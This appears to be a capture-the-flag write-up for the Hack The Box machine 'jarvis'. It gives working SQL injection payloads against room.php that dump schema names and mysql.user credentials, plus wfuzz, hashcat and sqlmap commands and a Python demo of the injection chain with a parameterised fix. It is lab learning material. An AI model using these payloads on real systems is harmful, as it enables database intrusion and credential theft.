80

Possible SQL injection

 wfuzz -u http://supersecurehotel.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404

Weed out the characters that change the response, then send the request to Repeater and fuzz by hand:

  • + and - could be for math

    • 1+1

    • 1 + 1

    • "1" + "1"

    • 2 - 1

  • . could mean the value is handled as an integer and not a float

  • ; ending the SQL statement

Characters that changed the response: + . ;

Confirm that arithmetic is evaluated server side (if it is, cod=3-1 returns the same page as cod=2):

GET /room.php?cod=3-1 

The SQL query most likely looks like this:

SELECT id, image, rating, name, cost, description from rooms where cod = 1

We can append any operation after the where condition.

A UNION SELECT also works after the where condition, but the injected row does not show up in the page because the real room row is the one rendered. With seven columns the page comes back without an error, so the UNION is accepted:

http://supersecurehotel.htb/room.php?cod=1%20union%20select%201,2,3,4,5,6,7

The statement should look like

SELECT id, image, rating, name, cost, description, UNKNOWN from rooms where cod = 1 union select 1,2,3,4,5,6,7

If the original query matches no row (cod=69 does not exist), the page renders the UNION row instead, so we control the output:

http://supersecurehotel.htb/room.php?cod=69%20union%20select%20"1","2","Adot8","4","5","6","7"
GET /room.php?cod=69+union+select+1,2,(select+@@version),4,5,6,7 
union select 1,2,(select schema_name from information_schema.schemata LIMIT 1),4,5,6,7
GET /room.php?cod=69+union+select+1,2,(select+group_concat(schema_name,":")+from+information_schema.schemata),4,5,6,7 
union select 1,2,(select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_schema.COLUMNS where TABLE_SCHEMA = 'hotel'),4,5,6,7
GET /room.php?cod=69+union+select+1,2,(select+group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n")+from+information_schema.COLUMNS+where+TABLE_SCHEMA+=+'hotel'),4,5,6,7 
union select 1,2,(select group_concat(host,":",user,":",password,"\r\n") from mysql.user),4,5,6,7
GET /room.php?cod=69+union+select+1,2,(select+group_concat(host,"%3a",user,":",password,"\r\n")+from+mysql.user),4,5,6,7 
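The whole chain above (arithmetic check, column-count discovery, pushing the UNION row into the rendered output with a non-existent cod, group_concat extraction from the catalog) as an added, self-contained example. This is not code from the page or from the box: SQLite stands in for MySQL so it runs offline (sqlite_master replaces information_schema, sqlite_version() replaces @@version), the rooms and users tables and the credential row are constructed, and the seventh column is an assumed "star" column standing in for the UNKNOWN one. A parameterised version of the same query is included to show what stops the injection.

```python
import re
import sqlite3

# Column list the notes infer for room.php, plus an assumed seventh column
# ("star") standing in for the UNKNOWN one. The table layout is constructed.
COLUMNS = "id, image, rating, name, cost, description, star"


def build_db():
    """In-memory SQLite stand-in for the hotel database (constructed rows,
    not the box's data; SQLite replaces MySQL so the example runs offline)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE rooms (cod INTEGER, id INTEGER, image TEXT, rating INTEGER,
                            name TEXT, cost INTEGER, description TEXT, star INTEGER);
        INSERT INTO rooms VALUES (1, 1, 'room1.jpg', 5, 'Superior Family', 270, 'Sea view', 1);
        INSERT INTO rooms VALUES (2, 2, 'room2.jpg', 3, 'Double Room', 200, 'Garden view', 0);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('dbadmin', 'constructed_hash_value');
    """)
    return db


def vulnerable_room(db, cod):
    """The assumed room.php query: cod is concatenated straight into the SQL."""
    query = f"SELECT {COLUMNS} FROM rooms WHERE cod = {cod}"
    return db.execute(query).fetchone()


def find_column_count(db, max_cols=10):
    """Append UNION SELECT 1..n until the database stops complaining about a
    column-count mismatch; the first n that succeeds is the column count."""
    for n in range(1, max_cols + 1):
        payload = "1 union select " + ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_room(db, payload)
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
        return n
    return None


def extract(db, subquery):
    """Make the original SELECT match nothing (cod=69) so the UNION row is the
    one rendered, and place the subquery in the third column (the room name)."""
    payload = f"69 union select 1,2,({subquery}),4,5,6,7"
    row = vulnerable_room(db, payload)
    return row[2]


def safe_room(db, cod):
    """Hardened version: reject anything but digits, then bind the value.
    Returns None for a rejected parameter (the app should answer 404)."""
    if not re.fullmatch(r"\d+", cod):
        return None
    query = f"SELECT {COLUMNS} FROM rooms WHERE cod = ?"
    return db.execute(query, (int(cod),)).fetchone()


if __name__ == "__main__":
    db = build_db()
    print("cod=3-1   ->", vulnerable_room(db, "3-1"))
    print("columns   ->", find_column_count(db))
    print("version   ->", extract(db, "select sqlite_version()"))
    print("tables    ->", extract(db, "select group_concat(name, ':') from sqlite_master where type='table'"))
    print("creds     ->", extract(db, "select group_concat(username || ':' || password, '\r\n') from users"))
    print("hardened  ->", safe_room(db, "69 union select 1,2,3,4,5,6,7"))
```

The column-count loop relies on the database raising an error for a mismatched UNION; against a live target the same signal is the page erroring (or changing) for n-1 and rendering normally for n, which is exactly what the seven-column request above shows.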
Crack the dumped MySQL hash (hashcat mode 300 = MySQL4.1/MySQL5):

hashcat -m 300 dbadmin.hash ~/rockyou.txt -O

OR

adot@kali:~/oscp/htb/linux/jarvis$ sqlmap -r req -D mysql -T user --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.5#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:29:37 /2024-06-02/

[11:29:37] [INFO] parsing HTTP request from 'req'
